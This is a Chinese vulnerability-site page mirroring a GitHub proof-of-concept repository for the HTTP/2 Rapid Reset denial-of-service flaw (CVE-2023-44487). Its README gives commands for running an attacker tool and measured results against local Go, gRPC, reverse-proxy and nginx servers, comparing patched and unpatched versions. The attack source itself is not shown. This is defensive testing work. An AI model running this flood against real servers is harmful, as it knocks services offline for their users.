漏洞平台

POC详情： a0299d4298489418b4eaa9e101bea6eb3edaf800

来源

https://github.com/ReToCode/golang-CVE-2023-44487

关联漏洞

标题： Apache HTTP/2 资源管理错误漏洞 (CVE-2023-44487)
描述：HTTP/2是超文本传输协议的第二版，主要用于保证客户机与服务器之间的通信。 Apache HTTP/2存在安全漏洞。攻击者利用该漏洞导致系统拒绝服务。以下产品和版本受到影响：.NET 6.0,ASP.NET Core 6.0,.NET 7.0,Microsoft Visual Studio 2022 version 17.2,Microsoft Visual Studio 2022 version 17.4,Microsoft Visual Studio 2022 version 17.6,Micros

介绍

# Golang CVE-2023-44487 testing

This repository contains testing resources and results for the CVE-2023-44487.
It uses a modified version of https://github.com/secengjeff/rapidresetclient to test against various Golang server configs.

## Testing against a normal server

```bash
go run server.go
go run attacker.go -requests 500000
```

### Results

**go 1.21.0**
```text
350% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Total time: 7.99 seconds (62562 rps)
```

**go 1.21.3**
```text
75% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 74767, RST_STREAM = 74767
Total time: 3.57 seconds (20921 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer
```

## Testing against a GRPC server

```bash
go run grpcserver.go
go run attacker.go -requests 500000
```

### Results

**go 1.21.0, golang.org/x/net v0.16.0, google.golang.org/grpc v1.58.0**
```text
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499998
Total time: 10.23 seconds (48898 rps)
```

**go 1.21.3, golang.org/x/net v0.17.0, google.golang.org/grpc v1.59.0**
```text
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499993
Total time: 8.25 seconds (60639 rps)
```

> The attacker does not really call GRPC endpoints, so there seems to be no difference in behaviour with "normal" http2 calls.
> Not super sure if this is good or bad, but the server manages to keep up with the traffic.


## Testing against a httputil.ReverseProxy server

```bash
# use nginx as target
sudo nginx -c $PWD/nginx/vulnerable_8444.conf -g daemon\ off\;
go run revproxyserver.go
go run attacker.go -requests 500000
```

### Results

**go 1.21.0**
```text
200% CPU load during the full attack

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 25
Total time: 9.43 seconds (53014 rps)
```

**go 1.21.3**
```text
150% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 100194, RST_STREAM = 100193
Total time: 4.36 seconds (22955 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

Server log now contains 😎
2023/10/25 14:45:54 http2: server connection error from [::1]:60762: connection error: ENHANCE_YOUR_CALM
```

## Testing against nginx

```bash
sudo nginx -c $PWD/nginx/vulnerable.conf -g daemon\ off\;
go run attacker.go -requests 500000
```

### Results

**With vulnerable config**

```text
100% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 478609
Total time: 8.13 seconds (61484 rps)
```

**With default config**
```text
34% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 1432
Total time: 7.62 seconds (65588 rps)
```

> Nginx just stops to respond to a lot of frames

文件快照


 [4.0K]  /data/pocs/a0299d4298489418b4eaa9e101bea6eb3edaf800
├── [5.3K]  attacker.go
├── [4.0K]  certs
│   ├── [1.2K]  server.crt
│   └── [1.7K]  server.key
├── [ 560]  go.mod
├── [1.8K]  go.sum
├── [1.5K]  grpcserver.go
├── [ 11K]  LICENSE
├── [4.0K]  nginx
│   ├── [ 401]  defaults.conf
│   ├── [  69]  README.md
│   ├── [1.2K]  server.crt
│   ├── [1.7K]  server.key
│   ├── [ 540]  vulnerable_8443.conf
│   └── [ 541]  vulnerable_8444.conf
├── [4.0K]  proto
│   ├── [5.9K]  ping.pb.go
│   └── [ 242]  ping.proto
├── [4.3K]  README.md
├── [ 533]  revproxyserver.go
└── [ 384]  server.go

3 directories, 18 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。